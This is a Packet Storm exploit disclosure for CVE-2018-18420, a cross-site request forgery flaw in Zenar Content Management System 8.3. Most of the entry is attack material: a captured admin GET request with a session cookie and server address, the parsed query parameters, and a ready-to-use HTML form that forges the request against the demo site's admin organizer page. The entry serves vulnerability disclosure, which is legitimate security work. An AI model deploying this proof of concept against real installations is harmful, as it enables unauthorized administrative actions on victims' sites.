Zenar Content Management System 8.3 Cross Site Request Forgery

2018-10-18T00:00:00
ID PACKETSTORM:149851
Type packetstorm
Reporter Ismail Tasdelen
Modified 2018-10-18T00:00:00

Description

                                        
                                            `# Exploit Title: Zenar Content Management System 8.3 - Cross-Site Request Forgery ( CSRF )  
# Date: 2018-05-21  
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: https://zenar.io/  
# Software Link : https://github.com/TribalSystems/Zenario/releases/tag/8.3.47997  
# Software : Zenar Content Management System 8.3  
# Version : 8.3  
# Vulernability Type : Web Application  
# Vulenrability : Cross-Site Request Forgery ( CSRF )  
# CVE : CVE-2018-18420  
  
# Cross-Site Request Forgery (CSRF) vulnerability was discovered in  
# the 8.3 version of Zenar Content Management System via the  
# admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent URI.  
  
# POC :  
  
# GET Request :  
  
Request URL: http://demo.zenar.io/zenario/admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent&skinId=&refinerId=html&refinerName=content_type&refiner__content_type=html&_limit=50&_start=0&_item=html_10&_sort_col=first_created_datetime&_sort_desc=0  
Request Method: GET  
Status Code: 200 OK  
Remote Address: 213.146.173.88:80  
Referrer Policy: no-referrer-when-downgrade  
Accept: text/plain, */*; q=0.01  
Accept-Encoding: gzip, deflate  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: keep-alive  
Cookie: PHPSESSID=1jltufrek0ugagehl7fjieeud6; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1  
Host: demo.zenar.io  
Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html  
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36  
X-Requested-With: XMLHttpRequest  
  
# Query String Parametres :  
  
path: zenario__content/panels/content  
skinId:   
refinerId: html  
refinerName: content_type  
refiner__content_type: html  
_limit: 50  
_start: 0  
_item: html_10  
_sort_col: first_created_datetime  
_sort_desc: 0  
  
# CSRF HTML :  
  
<html><head>  
<title> Zenar Content Management System - Cross-Site Request Forgery ( CSRF ) </title>  
</head><body>  
<form action="http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__content/panels/content/refiners/content_type//html//html_" method="GET">  
<input type="text" name="html_" value="10" /><br />  
<input type='submit' value='Go!' />  
</form>  
</body></html>  
  
# You want to follow my activity ?  
  
https://www.linkedin.com/in/ismailtasdelen  
https://github.com/ismailtasdelen  
https://twitter.com/ismailtsdln  
`